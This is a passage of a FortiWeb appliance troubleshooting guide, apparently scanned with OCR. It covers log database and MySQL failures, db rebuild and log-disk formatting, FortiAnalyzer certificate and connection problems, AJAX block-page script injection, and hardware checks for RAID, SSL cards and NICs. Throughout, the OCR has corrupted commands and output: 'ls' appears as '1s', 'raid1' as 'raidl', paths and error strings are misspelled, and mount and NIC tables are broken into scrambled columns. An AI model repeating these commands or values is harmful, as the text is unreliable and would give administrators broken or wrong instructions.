11-16-16:48:28.157212! 2818: dlog indexer.c(3569)@ mapping get tname:
mysglerr 2 0: MySQL server has gone away
11-16-16:48:28.157218! 2818: dlog indexer.c(3508)@ mapping get maxid:
mysqglerr 1 8: MySQL server has gone away
11-16-16:48:28.157228! 2818: dlog indexer.c(2210)@ create log tab

Example 2:
/# cat /var/log/dlog indexd | grep mysql
cannot connect mysql, try walk around (ret:0), mysglerr 1l:Can't connect to
local MySQL server through socket '/tmp/mysqgl.sock' (2)
cannot connect mysqgl, try walk around (ret:0), mysglerr 1l:Can't connect to
local MySQL server through socket '/tmp/mysgl.sock' (2)
cannot connect mysqgl, try walk around (ret:0), mysglerr 1l:Can't connect to
local MySQL server through socket '/tmp/mysqgl.sock' (2)

« /var/log/mysql/error.log

Similarly, we can also check if there is any fault in this log file:
/# cat /var/log/dlog indexd | grep mysqgl
cannot connect mysqgl, try walk around (ret:0), mysglerr 1l:Can't connect to
local MySQL server through socket '/tmp/mysqgl.sock' (2)
cannot connect mysqgl, try walk around (ret:0), mysglerr 1:Can't connect to
local MySQL server through socket '/tmp/mysqgl.sock' (2)
cannot connect mysqgl, try walk around (ret:0), mysglerr 1l:Can't connect to
local MySQL server through socket '/tmp/mysgl.sock' (2)

« /var/log/fwlog/root/disklog

All attack/event/traffic logs will be written to harddisk after logd received and handled logs sent by other
modules. Outputs in this file will help to check if logs have been written to the local disk successfully.
/var/log/fwlog/root/disklog# 1s -1

-rwWw-r—--r—- 1 root 0 417601 Nov 22 22:27 alog(2021-11-22-
22:26:09) .1log

1rTWXITWXIWX 1 root 0 57 Nov 22 22:26 alog.log ->
/var/log/fwlog/root/disklog/alog(2021-11-22-22:26:09) .1og

-rw-r—-r-- 1 root 0 459145 Nov 23 10:27 elog(2021-11-22-
14:34:23) .1og

1rWwXIwXIrwx 1 root 0 57 Nov 22 14:34 elog.log ->
/var/log/fwlog/root/disklog/elog(2021-11-22-14:34:23) .1og

—rw-r--r--— 1 root 0 46946294 Nov 22 23:13 tlog(2021-11-22-
15:59:23) .1og

-rw-r—-r-- 1 root 0 45953552 Nov 22 23:55 tlog(2021-11-22-

23:13:38) .1og
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1rWXITWXTWX 1 root 0 57 Nov 22 23:13 tlog.log ->
/var/log/fwlog/root/disklog/tlog(2021-11-22-23:13:38) .10og
#0One can just check the soft link for the latest logs.

/var/log/fwlog/root/disklog# tail -f tlog.log

v0llxxxxdate=2021-11-23 time=10:37:11 log 1d=30001000 msg id=000000102564 device
1d=FVVM04TM21000715 vd="root" timezone=" (GMT-7:00)Mountain Time (US&Canada)"
timezone dayst="GMTb+7" type=traffic subtype="https" pri=notice proto=tcp
service=https/tlsl.2 status=success reason=none policy="SP 01" original
src=172.30.213.98 src=172.30.213.98 src port=1941 dst=10.159.26.123 dst_
port=80 http request time=0 http response time=0 http request bytes=82 http
response bytes=923 http method=get http url="/" http agent="curl/7.78.0"
http retcode=200 msg="HTTPS get request from 172.30.213.98:1941 to
10.159.26.123:80" original srccountry="Reserved" srccountry="Reserved"
content switch name="none" server pool name="Pool Single" http
host="test.vm0l.com:7002" user name="Unknown" http refer="none" http
version="1.x" dev id=03AFBEAE2124AE47968CB4271208410FF9A8 cipher suite="TLS
ECDHE RSA WITH AES 256 GCM SHA384"

6. Check log related backend counters:

Logd will receive, handle, index and display logs sent by the system processes or specific function modules on
GUI, while in abnormal situations it fails to do so. Then it’s useful to double check with two backend counters for
attack/event/traffic logs.

/# cd /proc/miglog/
/proc/miglog# 1s

alog dlog elog tlog
/proc/miglog# 1ls alog/

brief queue max_len

/proc/miglog# 1ls elog/

brief queue max_len

/proc/miglog# ls tlog/

brief queue max_ len

/proc/miglog# 1ls dlog/ #dlog is for debug only; just ignore it
brief queue max_ len

/proc/miglog/tlog# cat queue max len

163840 #The log queue length; usually fixed

/proc/miglog/tlog# cat brief

total 4

enqueued 4 #New logs are sent from other process/module; one new HTTP/HTTPS
session usually increase this count by 1

dequeued 4 #New logs received are processed by logd; should be the same as eng

overflow 0 #Not 0 means log overflows caused by too many logs generated; one
may need check current CPS or disable traffic logs

error O #kernel errors that cause logging failures

7. Use “execute db rebuild” to rebuild log database :
Use this command to rebuild the FortiWeb appliance’s internal database that it uses to store log messages.
Please note there are some behavior differences between 6.x and later releases:

« On 6.x builds, db rebuild also erases databases for ML, while on 7.0.0 and later builds, this operation will
only clean and rebuild databases for disklog; you can execute redis rebuild to clean ML databases.

« Historical traffic/attack/eventlogs will not be cleared, while one needs to wait several minutes for log index
rebuilding - the time is based on log amount;

« In HA mode, executing db rebuild on primary appliance will take effect on all secondary appliances
simultaneously on 6.x builds, whereas on 7.0.0 and later builds, rebuilding just impacts local box instead of
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the whole HA groups.

« With 6.x builds, executing this command will trigger FortiWeb system reboot, while with 7.0.0 and later, this
command will not lead to system reboot.

6.x old builds: (Reboot system)

FortiWeb# exec db rebuild

This operation will clean and rebuild database for disklog, and will clean
database for ML and Client Management, and it will reboot the system!

Do you want to continue? (y/n)y

rebuilding the database......

FortiWeb# Connection closing...Socket close.
FortiWeb starts to reboot...

6.3.16, 7.0.0 and later: (Not reboot system)

FortiWeb # execute db rebuild

This operation will clean and rebuild database for disklog.
Do you want to continue? (y/n)y

rebuilding the database......

FortiWeb #

8. Use “execute formatlogdisk” to clear the logs from the FortiWWeb appliance’s hard disk and reformat the
disk.

This operation is more dangerous than “execute db rebuild” because it formats the whole log disk /var/log, so
all logs and databases used by varied modules stored on this disk will be cleared.

One point here is, signatures will be cleared so they will be downloaded again after system reboot. (proxyd
restart will re-create the signature database)

FortiWeb # execute formatlogdisk

This operation will clear all logs on the Hard Disk and take a few minutes depending
on the disk size!!

Please backup system configuration and restore it after format operation, otherwise
openapi data will be lost!

Do you want to continue? (y/n)y

/# df -h

Filesystem Size Used Available Use% Mounted on
/dev/root 472 .5M 355.6M 117.0M 75% /

none 1.1G 176.0K 1.1G 0% /tmp

none 3.8G 2.9M 3.8G 0% /dev/shm
/dev/sda2 362.4M 270.0M 72.8M 79% /data
/dev/sda3 90.6M 56.0K 85.6M % /home
/dev/sda4d 30.5G 604.4M 28.4G 2% /var/log

Step-by-step troubleshooting for log display on FortiWeb GUI failures

Logs could be displayed before but now it’s empty on GUI

Please follow these steps to check the issue:
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1. Check if logs files (/var/log/fwlog/root/disklog) are still there.
If no, check if someone executed formatlogdisk command or deleted log files by mistake; if yes, go next
step.

2. Check if mysqld still works:
« Check “ps | grep mysqld” to verify the daemon is still running and without keep restarting
« Check error.log & check dlog_indexd to see if there are error messages; referring to above section 8.1
« Download error.log & check dlog_indexd for further investigation
« You can also try to reboot FortiWeb to see if the log issue may disappear
3. Execute db rebuild. if it still does not work, go to the next step.

4. Diagnose hardware check to see if HD is ok. If no, then go RMA,; if yes, keep the debug info and contact
support.

Old logs are available on GUI but no new logs displayed

Some possible causes:

HA-AA mode: In this mode, all the FortiWebs are active and requests are distributed over them. Every FortiWeb
in this mode processes its own requests and keeps its own logs. If you do not see logs on one FortiWeb, check
the logs on the other FortiWebs.

Database is rebuilding: For some cases, it would take a long time to complete database rebuild. While the
database is rebuilding, new generated logs are postponed to be written to the database so that the new
generated logs are not available immediately on GUI. The logs are entirely saved in log files, no logs would be
lost.

Daemons issues: try DB rebuild
For other causes, please follow these steps to check the issue:

1. Verify the configuration.
2. Verify that logd and indexd are working normally and stably.
3. Check “diagnose debug application logd” to see if logd is receiving logs.

« if no, itindicates that FortiWeb function/daemons does not send logs to logd. You need to check the
issue of corresponding daemons.

« ifyes, goto the next step.

4. Check “diagnose debug application logd” output to see if logs have been saved to log files, or you can
double check log files (tail -f /var/log/fwlog/root/disk/tlog.log, or elog.log/alog.log).

« ifno, check if the log disk is full:
df -h
« Execute hardware health check to see if hard disk is normal.
if yes, go to next step
5. Check dlog_indexd to see if logs are processed and delivered to the log database.

6. Collect results of above diagnose steps and download error.log & check dlog_indexd for further
investigation.
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New logs displayed on GUI with delay

Check if system cpu usage is very high.

If CPU usage is very high, logs may not be able to be delivered to logd or written to disk, thus cannot be
displayed immediately.

Check dlog_indexd, to see if doing db rebuild or other daemons occupies resource and delay the new logs.

Logs cannot be displayed on FortiAnalyzer

Besides being restored in local disk, Attack/Traffic/Event logs can also be delivered to FortiAnalyzer. This
section provides troubleshooting methods when Attack/Traffic/Event logs failed to be displayed on
FortiAnalyzer (abbreviated as FortiAnalyzer in below section).

The possible causes usually include:

« FortiAnalyzer certificate issue
« TCP connection issue with FortiAnalyzer

FortiAnalyzer certificate issue

Certificates 'fortinet-subca2001' and 'fortinet-ca2' are necessary on FortiAnalyzer for establishing SSL
connection with FortiWeb. If these certs are lost on FortiAnalyzer, FortiWeb will fail to establish connection with
FortiAnalyzer and thus fail to send logs to FortiAnalyzer.

1.

FortiWeb Trouble-shooting Guide

Basic check

Check if there are 2 certificates 'Fortinet_ SUBCA'’ & ‘Fortinet_ CA' on the FortiAnalyzer (System Settings
> Certificates > CA Certificates).

If they are not there, download these two certificates from another FortiAnalyzer and import them to the
current FortiAnalyzer.

Use diagnose commands to check and analyze certificate issues.

On FortiWeb

diagnose debug application oftp 7
diagnose debug enable

The following errors indicates failing to establish SSL connection between FortiWeb and FortiAnalyzer:

[OFTP] [DEBUG] (oftp async.c:386): oftp auth send: auth send done fd=14...

[OFTP] [DEBUG] (oftp async.c:420): oftp auth recv: fd=14, buf pos=0,buf len=12

[OFTP] [DEBUG] (oftp async.c:429): oftp auth recv: read again : errno=Resource
temporarily unavailable B -

On FortiAnalyzer

# diagnose debug application oftpd 8
# diagnose debug enable

The following message indicates FortiAnalyzer certificate verification failed because the necessary CA cert
(CN=fortinet-ca2) is not available on the FortiAnalyzer.

160

Fortinet Technologies, Inc.



Diagnose software function issues 161

FortiWeb sends its cert (CN = FortiWeb) to FortiAnalyzer for auth. This cert is signed by an intermediate CA
(fortinet-subca2001) and the root CA (fortinet-ca2). FortiAnalyzer needs the 2 CA certs to verify the
received cert.

[ verify callback:475] VERIFY ERROR: depth=2, error=self signed certificate in
certificate chain: /C=US/ST=California/L=Sunnyvale/O=Fortinet/OU=Certificate
Authority/CN=fortinet-ca2/emailAddress=support@fortinet.com

[ SSL info callback:310] SSL Alert write: fatal unknown CA

[ SSL info callback:320] error

[ SSL info callback:334] Error error:1417C086:SSL routines:tls process client
certificate:certificate verify failed

[OFTP_try accept SSL connection:1686 192.168.14.20] SSL accept failed

The solution is to download these two CA certificates (CA_Cert_1 & CA_Cert_2) and import them to the
FortiAnalyzer (System Setting > Certificates > CA Certificates).

TCP connection issue with FortiAnalyzer

Long time after FortiWeb sends logs to FortiAnalyzer, sometimes we may encounter the issue that
FortiAnalyzer cannot receive new logs from FortiWeb.

1. Use diagnose commands on FortiWeb to analyze:
diagnose debug application oftp 7
diagnose debug enable

Logs are not sent out and the queue is full if seeing the following:
[OFTP] [WARN] (log oftp.c:1006): queue[IP ADDRESS] full: fd=14, discard oldest one!

2. Capture packets on FortiWeb corresponding interface (the interface connecting to FortiAnalyzer), and in
the packets there might be.

« Many [TCP ZeroWindow] (Win=0) tagged to TCP ACK packets sent from FortiAnalyzer to FortiWeb.

It means FortiAnalyzer is informing FortiWeb to stop sending data because full cache (Win=0) on
FortiAnalyzer.

« Many TCP Dup Ack from FortiAnalyzer and TCP Retransmission from FortiWeb after FortiWeb sent
TLS application data to FortiAnalyzer.

It means FortiWeb sent the logs but received no ACK from FortiAnalyzer.
Suggest to reboot FortiAnalyzer to re-establish new connection between FortiWeb and FortiAnalyzer.

Packet log of attacks is enabled on FortiWeb but they are not displayed on
FortiAnalyzer

When a feature is enabled in FortiWeb' GUI Log&Report > Log Config > Other Log Settings > Retain
Packet Payload For, the attack packet’s payload that buffered and parsed by HTTP parser will be displayed in
attack logs and sent to FortiAnalyzer.

It's an unobvious place on FortiAnalyzer to see such packet payload. Please check FortiAnalyzer > Log View
> FortiWeb > Application Attack Prevention > log detail of an attack log. Packet headers and raw data are
available by clicking the Data icon.
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View Attack Content

Packet Header
HTTP/1.1

dlick it
hrome/91.0.4472.124 Safari/s37.36
bp, image/apng, */*;q=0.8,application,

[ 1]
=

Replacement message

» How does Support AJAX Requests in Replacement Message work? on page 162
« Can we add an exception for Replacement Message > Support JAX Requests? on page 163

FAQ

How does Support AJAX Requests in Replacement Message work?

You can enable Replacement Message for AJAX requests to respond to a AJAX request, and configure the
AJAX block page message. You must enable it by going to System > Config > Feature Visibility first.

The replacement message for AJAX requests is different from the other replacement messages:

« If Support AJAX Requests is enabled and the response Content-Type is text/html and also the response
status code is 200, when FortiWeb receives responses from the backend server, it will insert two .js scripts
into the HTML response:

« ajaxhook.min.js
e 122710291618 _index.js

« Once the clients call AJAX functions open() and send(), “122710291618_index.js” will hood the request
and insert “X-FortiWeb-AJAX-BLOCK” into the request header;

« When FortiWeb gets the request with the “X-FortiWeb-AJAX-BLOCK” header, it will record this, and then
remove the “X-FortiWeb-AJAX-BLOCK” header from the request and forward the request to backend
servers;

« If both requests and responses comply with all rules on FortiWeb, there’s nothing to do and everything
works fine. But if either requests or responses violate any one rule, and also FortiWeb needs to return an
error page to clients, FortiWeb will insert an HTTP “X-FortiWweb-AJAX-REPONSE” header into the returned

error page.
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« When clients receive AJAX responses, “122710291618_index.js” will hood the responses and check them.
If there’s “X-FortiWeb-AJAX-REPONSE” in the header, the error page message will be alerted in GUI. On
the contrary, no “X-FortiWeb-AJAX-REPONSE” in the header means normal response.

<« C' A Notsecure | hips://test.custom.com/testajax.html

:‘ Send | Sample to test replacemd

®

v @

test.custom.com says

{"error": "We are using security software that has blocked your access to
this page. If you believe that you have been blocked in error, please
contact us at help@fortinet.com and include your IP address (from the

bottam of this page) and the date, time (with time zone) at which you

received this message.”}

Network  Performance  Memory  » s i X

ble cache Nothrotting v = £ ¥

data URLs

WS Wasm Manifest Other [J Has blocked cockies

Name Status  Type
[E testajax.ntml 200 docu..,
Jguery.minjs 304 script
ajaxhook.minjs 200 script
[ index.php 200 xhr

8000 ms 10000 ms 12000 ms 14000 ms
Initiator Size Time Waterfall A
Other 1.1kB 330ms 1
testajax.ntml 2268 11915 E——
lestajax.ntm| 12k 24ms |
testajax.ntml 42kB 177 ms 1l
ajaxhook.min... 88B 179 ms

So, actually even if "Support AJAX Requests" is disabled, the "AJAX block" function still works. The only
problem is that it is no longer so user-friendly. That means there would be no conspicuous GUI prompt
when the AJAX requests are blocked.

Can we add an exception for Replacement Message > Support JAX Requests?

There have been customer issues reporting that the target URL cannot be visited due to conflict between our

injected .js scripts and the customer’s source code of the webpage. Sometimes it's hard to locate the root cause
from these customer pages or 3rd-party code.

The latest build 7.0.0 provides an enhancement that one can add a URL Access Rule or IP List to bypass the
injection of such .js scripts. In this case, the AJAX block function still works, while the two .js scripts will not be
injected by FortiWeb, thus the client browser will not prompt a warning message even if the AJAX request is

blocked.
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Using diagnose commands ...

Diagnosing Power Supply issues

Diagnosing hard disk issues ...

Diagnosing SSL Card issues

Diagnosing NIC issues .................................

Using diagnose commands

Use diagnose commands to check and analyze hardware related issues:

FortiWeb # diagnose hardware
bypass bypass

check check
cpld cpld

cpu cpu
fail-open fail-open
harddisk harddisk
interrupts interrupts
logdisk logdisk

mem mem

nic nic

raid raid
raid-card raid-card
sysinfo sysinfo

FortiWeb # diagnose hardware check all
khkkhkkhkhkhkhkkhkkhkhkhkhkhkhkhAkhhkhkhhkhkhhkhkhkhrhhkkhhhrhrhkkhkhkhrhkhkkhkhhrhkkhkhxkhkx

CPU check Pass

core—-number Pass 4

cpu-number Pass 1

frequence Pass 3564

cache-size Pass 6144

model-name Pass Intel (R) Core(TM) i3-8100 CPU @ 3.60GHz

KKK KA A KR A KA IR A A A AR A A A A AR AR AR AR A A AR A A A A A A ARk x Ak kK

KA KA A A KA AR AR A A A A AN A A A A A A IR AR AR A A A A A A A A A Ak x A kK

Memory check Fail
Total-size Fail 8097512
frequence Pass 1600

R R S b S S S b b S R S Sb i Sb b S Sb S Sb b Sb b S b S 2h b S Sb b Sb b b Sh S db I 2b db b 3b 3

R R S b I b b Sb b b dh R S Ib  Sb b I 2b S S SE b Sb db b b S 2h 2E S Sb b Sb b b db S 4b I Sb db b 2b 3

logdisk check Pass
size Pass 468
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disk-number Pass 1
PR I i I I e I e I I e b b I b I b I I b b I b b b b b b4
PR I I I I i I b b b b b b I b I e b b I e b b I b b b I I b b I b b b b b b b4
NIC check Pass
num Pass 8
Giga nic num Pass 8
10G nic num Pass 0

Ak hkkhk Ak hkrhhkhkhkhAhkkrhkhkhhhkrhkhkhkhdkhkkrhkkrkhkhkrhkkhkhkhhkkhxkkxk

Diagnosing Power Supply issues

Use these tools to check and diagnose possible power supply issues:

Check hard disk status

FortiWeb # execute sensors-list

Power Module 1

Power Module Status: power up

Power Module 2
Power Module Status: power down

Diagnosing hard disk issues

How do | set up RAID for a replacement hard disk?

The procedures applies to all models except 100D, 400B, 400C, and 400D.
1. Power off the FortiWeb.
2. Remove the hard disk from FortiWeb and install the new hard disk.
3. Poweron the FortiWeb.
4. Use the following command to initialize RAID:

execute create-raid level raidl
5. Entery to confirm the initialization.
FortiWeb reboots and starts the RAID initialization. The process can take a few hours to complete.
6. Use the following command to check the RAID status:

diagnose hardware raid list

If the process is successful, a message similar to the following is displayed:

FortiWeb # diagnose hardware raid list
level size (M) disk-number
raidl 1876242 0 (OK), 1 (OK)
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If FortiWeb is unable to write log messages to the disk, a message similar to the following is displayed:

level size (M) disk-number
raidl 1877665 0 (Not Present), 1 (Not Present), 2 (Not Present), 3 (Not Present)

For additional information on using these CLI commands, see the FortiWeb CLI Reference:

https://docs.fortinet.com/product/fortiweb/

Collecting below information for further analysis:

1. Diagnose hard disk status
FortiWeb# diagnose hardware harddisk list

name size (M)
sda 959656.76
sdb 8012.39

FortiWeb# diagnose hardware raid list
level size (M) disk-number
raidl 899811 0 (OK), 1 (OK)

2. Diagnose hard disk health status by using SMART tool.
« Show all hard disk S.M.A.R.T information
execute smart info
« Enable S.M.A.R.T support. It's enabled by default for hardware hard disk
execute smart enable
« Run self-test for hard disk. It will take some time
execute smart self-test
« show the test result
execute smart test-result
SMART commands are supported:
6.3.x after build 1144
6.4.x after build 1421

This tool only supports hardware machines. VMs do not have hardware hard disks so are not
supported.

3. Use the tool MegaCli to check RAID information:
/# fn sh
/# MegaCli -PDList -aALL

4. Check more detailed info in dmesg.

/# dmesg

[ 0.000000] Linux version 5.4.0 (root@jenkins-dell-22) (gcc version 9.2.0
(FortiWeb 9.2.0)) #1 SMP Thu Jun 10 21:37:23 UTC 2021

[ 0.000000] Command line: rw panic=5 clocksource=tsc root=/dev/ram0 ramdisk
51ze=500000 eagerfpu=on mitigations=off crashkernel=128M softlockup all cpu
backtrace=1 hardlockup all cpu backtrace=1 initrd=/rootfs.gz
console=ttyS0, 9600
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5. Check filesystem mount status:
FortiWeb # diagnose system mount list
Used Available Use$%

Filesystem
/dev/ram0
none

none
/dev/sdbl
/dev/sdb3
/dev/sdal

1M-blocks
473

1164

3880

362

91

449651

Diagnosing SSL Card issues

Collect below information for further analysis:

1. Diagnose commands for hardware SSL card:

FortiWeb# diagnose hardware check sslcard
Ssl card intel check
FortiWeb # diagnose hardware check sslcard
Ssl card cp9 check

##After v5.85,

Pass

Pass

310
31

3
254
0
7771

#intel card

162
1132
3877

89
86
418971

#cp9 card

ssl card status can be shown with:

FortiWeb# diagnose debug sslhardwarestatus show

proxyd using cp9 engine

Or

#cp9 card works

FortiWeb# diagnose debug sslhardwarestatus show

proxyd not using engine

FortiWeb # diagnose hardware cavium3 status

Or

FortiWeb # diagnose hardware cp9 status
Tue Jan 18 22:07:53 2022

kxp[0]:{0:0:0:0:0
kxp[1]:{0:0:0:0:0
vpn[0]:{0:0:0:0:}
vpn[1l]:{0:0:0:0:}

:0:0:0:0:0:0:0:0:0:
:0:0:0:0:0:0:0:0:0:

0:0:}
0:0:}

65%
2%
0%

74%
0%
1%

Mounted on
/

/tmp
/dev/shm
/data
/home
/var/log

#cp9 card does not work well

##Below commands are available but might be removed soon
##Need to enable high-compatibility-mode before diagnose cavium card info

FortiWeb

(setting)

# show

config server-policy setting
set high-compatibility-mode enable

End

FortiWeb # diagnose hardware cp9 test 1

cp_uio: Detect KXP device[0]
cp_uio: Detect KXP device[l]
cp_uio: Detect VPN device[0]
cp_uio: Detect VPN device[l]
Testing kxpvpn memory...

num 1
Done

Testing RNG interface (bytes:
Done
Testing BN mod exp interface...
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Testing BN mod exp mod 1K
Done
Testing BN mod exp mod 2K
Done
Testing BN mod exp mod 3K
Done
Testing BN mod exp mod 4K
1.0 ops/s 0.0 MB/s
Done
Done
Testing RSA mod exp interface...
Testing RSA mod exp mod 1lk
Done
Testing RSA mod exp mod 2k
Done
Testing RSA mod exp mod 3k
Done
Testing RSA mod exp mod 4k
Done
Done
Testing ssl3 generate master secret...
Done
Testing ssl3 setup key block...
1.0 ops/s 0.0 MB/s
Done
Testing tls generate master secret...
Done
Testing tls setup key block...
Done
Testing ECSKEY (NID:415, prime256vl)...
Done
Testing ECSKEY (NID:715, secp384rl)...
Done
Testing ECSKEY (NID:716, secpb52lrl)...
1.0 ops/s 0.0 MB/s
Done
Testing ECSIGN (NID:415, prime256vl)...
Testing ECSIGN(NID:715, secp384rl)...
Testing ECSIGN (NID:716, secpb52lrl)...
Testing ECVERIFY (NID:415, prime256vl)...
Testing ECVERIFY (NID:715, secp384rl)...
1.0 ops/s 0.0 MB/s
Testing ECVERIFY (NID:716, secpb52lrl)...
Testing AES interface...

Done
Testing DES interface...
Done
Testing 3DES interface...
Done

>>>> System Memory <<<<

block[128]: 2048/2048
block[256]: 2048/2048
block[512]: 2048/2048
block[1024]: 10240/10240
block[2048]: 10240/10240
block[4096]: 10240/10240
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block[8192]: 8192/8192

block[16384]: 2048/2048
block[32768]: 2048/2048
Size: 237312 Mbytes

>>>> Status <<<<

kxp[0]:{0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:1}
kxp[1]:{0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:1}
vpn[0]:{0:0:0:0:}

vpn[1l]:{0:0:0:0:}

RNG 1 00
SSL3_GENMS 1 00
SSL3_GENKM 1 00
TLS GENMS 1 00
TLS GENKM 1 00
PKCE 1024 1 00
PKCE 2048 1 00
PKCE 4096 2 00
CRT_PARAM 1024 1 00
CRT_PARAM 2048 1 00
CRT_PARAM 4096 2 00
CRT 1024 1 00
CRT 2048 1 00
CRT 4096 2 00
EC _SIGN 3 00
EC_VERIFY 3 00
ECSKEY 3 00
NID aes 128 shal 1 00
NID des ede3 cbc 1 00

NID des cbc

=
o
o

2. Check more detailed infomation in dmesg or /var/log/dmesg/kern.log:
[ 50.617068] Loading QAT CONTIG MEM Module
[ 50.893620] cobxx 0000:1a:00.0: gat dev0 started 8 acceleration engines
[ 51.508620] cé6xx 0000:1b:00.0: gat devl started 8 acceleration engines
[ 51.859112] igb 0000:02:00.0 mgmtl: igb: mgmtl NIC Link is Up 1000 Mbps Full
Duplex, Flow Control: RX

[ 51.862020] QAT: Stopping all acceleration devices.

[ 51.862029] cébxx 0000:1a:00.0: gat dev0 stopped 8 acceleration engines
[ 51.862324] cbxx 0000:1a:00.0: Resetting device gat dev0

[ 51.862325] cb6xx 0000:1a:00.0: Function level reset

[ 51.965722] céxx 0000:1b:00.0: gat devl stopped 8 acceleration engines
[ 51.965811] IPv6: ADDRCONF (NETDEV CHANGE): mgmtl: link becomes ready

[ 51.966034] cbxx 0000:1b:00.0: Resetting device gat devl

[ 51.966034] co6xx 0000:1b:00.0: Function level reset

[ 53.071493] cbxx 0000:1a:00.0: Starting acceleration device gat devO.
[ 53.334619] cébxx 0000:1a:00.0: gat dev0 started 8 acceleration engines
[ 53.688343] cbxx 0000:1b:00.0: Starting acceleration device gat devl.
[ 53.951619] cé6xx 0000:1b:00.0: gat devl started 8 acceleration engines

Diagnosing NIC issues

Sometimes diagnosing NIC issues is important, especially for hardware FortiWeb appliance.
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Use diagnose command to check and analyze NIC related issues:
FortiWeb # diagnose hardware nic list port9

170

driver

version
firmware-version
bus-info

Supported ports:

igb

5.6.0-k

3.29, 0x8000021a
0000:85:00.0

[ TP ]

Supported link modes: 10baseT/Half 10baseT/Full

Supported pause frame use:
Supports auto-negotiation:
Supported FEC modes:

100baseT/Half 100baseT/Full
1000baseT/Full

Symmetric

Yes

Not reported

Advertised link modes: 10baseT/Half 10baseT/Full

Advertised pause frame use:
Advertised auto-negotiation:
Advertised FEC modes:

Speed:

Duplex:

Port:

PHYAD:
Transceiver:
Auto-negotiation:
MDI-X:

Supports Wake-on
Wake-on

Current message level
Link detected

Link encap
HWaddr
INET addr
Bcast

Mask

FLAG

MTU

MEtric
Outfill
Keepalive

Memory

RX packets
RX errors
RX dropped
RX overruns
RX frame

TX packets
TX errors
TX dropped
TX overruns
TX carrier
TX collisions
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100baseT/Half 100baseT/Full
1000baseT/Full
Symmetric

Yes

Not reported

1000Mb/s
Full
Twisted Pair
1
internal
on
off (auto)
pumbg
S)
0x00000007 (7)
yes

Ethernet

08:35:71:11:65:BB

0.0.0.0

10.52.255.255

255.255.0.0

UP BROADCAST RUNNING MULTICAST
1500

1

538970656

538976266

fbd80000-fbdfffff
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TX queuelen

RX bytes

TX bytes
Adaptive RX
Adaptive TX
stats-block-usecs
sample-interval
pkt-rate-low
pkt-rate-high
rx-usecs
rx—-frames
rx-usecs-irq
rx-frames-irqg
tx-usecs
tx-frames
tx-usecs-irqg
tx-frames-irqg

1000

60 (60.0 b)
10360 (10.1 Kb)
off

off

0

0

O O O O O O wo

o

2. Use backend tools to check and analyze NIC related issues:

/# ifconfig portl

portl Link encap:Ethernet
inet addr:10.50.0.228

HWaddr 08:35:71:16:F5:42
Bcast:10.50.255.255

171

Mask:255.255.0.0

inet6 addr: fe80::a35:71ff:fel6:£542/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:198 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:0 (0.0 B) TX bytes:13908 (13.5 KiB)

#0One can pay special attention to errors highlighted as above. If these
error statistics continuously increase, it usually means a NIC issue or
performance issue.

Errors: counts CRC errors, too-short frames and too-long frames. This can
result from faulty network cables, faulty hardware (e.g., NICs, switch
ports), CRC errors, or a speed/duplex mismatch.

Dropped: packets dropped here include NIC ring buffers full, CPU receiving NIC
interrupts is very busy, cable/hw/duplex issues and driver issues

Overruns: The overruns field counts the times when there is fifo overruns,
caused by the rate at which the buffer gets full and the kernel isn't able
to empty it.

Frame: counts the number of received misaligned Ethernet frames; it usually
means receiving invalid frames or CRC errors.

/# ethtool portl
Settings for portl:

Supported ports: [ FIBRE

Supported link modes:

Advertised auto-negotiation:

Speed: 40000Mb/s
Duplex: Full

Port: FIBRE

PHYAD: O

Transceiver: internal
Auto-negotiation: off
Supports Wake-on: g
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40000baseSR4/Full
Supported pause frame use:
Supports auto-negotiation:
Advertised link modes: 40000baseSR4/Full

Advertised pause frame use:
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Wake-on: g
Current message level: 0x00000007 (7)
drv probe link
Link detected: yes
#One can also add some options such as -S to check more details for a
NIC:
/# ethtool -S portl | grep drop
rx_dropped: O
tx dropped: O
port.rx dropped: 0
port.tx dropped link down: 1
/# ethtool -S portl | grep errors
rx _errors: 0
tx errors: 0
rx length errors: 0
rx crc_errors: O
veb.tx errors: 0
port.tx errors: 0
port.rx crc_errors: O
port.rx length errors: 0
/# ethtool -S portl grep crc
rx crc errors: 0

port.rx_crc_errors: 0

/# dmesg | grep portl (or driver name, etc.)
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System tools & diagnose commands

To locate system and network issues, FortiWeb appliances provide several troubleshooting tools.
Troubleshooting methods and tips may use:

« The command line interface (CLI & Backend Shell)
« Diagnostic commands
o Execute commands
« Backend Shell commands & tools

e The Web Ul

« External third-party tools

Some CLI commands provide troubleshooting information not available through the web Ul; third-party tools on

external hosts can test connections from perspectives that cannot be achieved locally.

Diagnostic Commands

Execute COMMaAaNAS ... ... ...

Diagnostic Commands

Most diagnostic tools are in the CLI and are not available from the web Ul. Many are used in the above sections.
For more information on the diagnose command and other CLI commands, see the FortiWeb CLI Reference:

https://docs.fortinet.com/product/fortiweb/

The main diagnostic commands are listed as below:

Diagnose debug

FortiWeb-AWS-MO01l # diagnose debug

admin-https admin-https

application set/get debug level for daemons
cli debug cli

cloudinit cloudinit

cmdb debug cmdbsvr

console console

coredumplog coredumplog
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crashlog crashlog
daemonlog daemonlog
disable disable debug output
dnsproxy dnsproxy
dpdkpktinfo dpdkpktinfo
emerglog emerglog
enable enable debug output

flow flow

info show active debug level settings
jemalloc jemalloc

jemalloc-conf jemalloc-conf
jemalloc-heap jemalloc-heap

kernlog kernlog
memory dump internal memory usage
netstatlog netstatlog

proxy set/get debug for proxyd
reset reset all debug level to default
serial (ttySO) serial (ttySO0)
sslhardwarestatus sslhardwarestatus
sysinit sysinit

timestamp timestamp

trace trace

ttp ttp
vm vm
waf waf
writedisk writedisk

Diagnose network

Show, add or delete IP address, ARP, TCP/UDP connection, route tables, etc.

FortiWeb # diagnose network

aggregate 802.3ad link aggregation
arp arp

ip ip

irqg read network irqg

redundant redundant interface
route route

rtcache rtcache

rule rule

sniffer sniffer network traffic
tcp tcp

udp udp

vip vip

Diagnose policy

Use this command to view the process ID, live sessions, and traffic statistics associated with a server policy.

FortiWeb # diagnose policy

awscloud-stats awscloud-stats
conn-psec conn-psec
detail-stats detail-stats
period-blockip period-blockip
back-end server back-end server
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quarant-ip quarant-ip

server-pool server-pool

session session

total-conn-psec total-conn-psec
total-detail-stats total-detail-stats
total-session total-session
total-traffic total-traffic
traffic traffic

vdom-session vdom-session
vdom-traffic vdom-traffic
worker-detail-stats worker-detail-stats

Execute Commands

